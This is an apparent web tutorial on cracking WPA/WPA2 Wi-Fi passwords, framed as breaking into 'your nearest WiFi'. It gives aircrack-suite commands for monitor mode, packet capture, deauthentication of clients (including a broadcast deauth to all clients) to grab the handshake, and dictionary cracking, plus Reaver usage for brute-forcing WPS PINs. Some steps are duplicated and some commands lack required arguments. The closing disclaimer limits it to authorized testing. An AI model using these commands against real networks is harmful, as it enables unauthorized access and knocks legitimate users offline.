How To Hack WAP or WPA2 WiFi Security Fully Explained
As Compared to WEP WiFi Hacking as explained on our previous tutorial, WPA/WPA2 is quite difficult and time consuming because of its Security. Cracking the password sometimes depends on your luck and success is not guaranteed.
..:: How to launch a Dictionary Attack on WPA Handshake ::..
You might get lucky and your nearest WiFi password may be based on a common dictionary word or number sequence. In such a case, you may succeed with a dictionary attack.
Step 1: Enable monitor mode on wireless interface
#airmon-ng start wlan0
Step 1: Enable monitor mode on wireless interface
#airmon-ng start wlan0
This will start the monitor mode.
Step 2: Take note of the nearest WiFi networks.
#airodump-ng mon0
Step 2: Take note of the nearest WiFi networks.
#airodump-ng mon0
Step 3: Take note of the channel of your target network, dump packets from that channel and save them to a local capture file.
#airodump-ng -c6 mon0 -w capture_file
#airodump-ng -c6 mon0 -w capture_file
Step 4: Wait for WPA handshake capture
At this point, you can use 'aireplay-ng' to de-authenticate an associated legitimate client from the network. The point is that as he/she will authenticate again shortly, we will capture the handshake without having to wait too long:
#aireplay-ng --deauth 0 -a -c mon0
At this point, you can use 'aireplay-ng' to de-authenticate an associated legitimate client from the network. The point is that as he/she will authenticate again shortly, we will capture the handshake without having to wait too long:
#aireplay-ng --deauth 0 -a
If you don't know the MAC of any associated client, simply 'broadcast' a 'deauth' to all clients:
#aireplay-ng --deauth 0 -a mon0
#aireplay-ng --deauth 0 -a
#aircrack-ng capture_file-01.cap -w listfile.lst
You can also use online distributed WPA/WPA2 handshake cracking tool on this website:
Note that if the Access Point has WPS Enabled, it becomes easier to recover the WPA / WPA2 passphrase as there are only 11,000 possible combinations needed to brute force the WPS PIN due to an implementation flaw.
Another tool called 'Reaver' can be used for WPA cracking, if WPS is enabled.
Here's the sample use of reaver:
#reaver -i mon1 -a 94:D7:23:48:BE:78 -vv -c8
-i is for interface
-a "94.... " is the bssid of hotspot
-vv for verbose mode
-c to specify the channel
Disclaimer: This is for experimentation or authorized penetration testing purposes only.
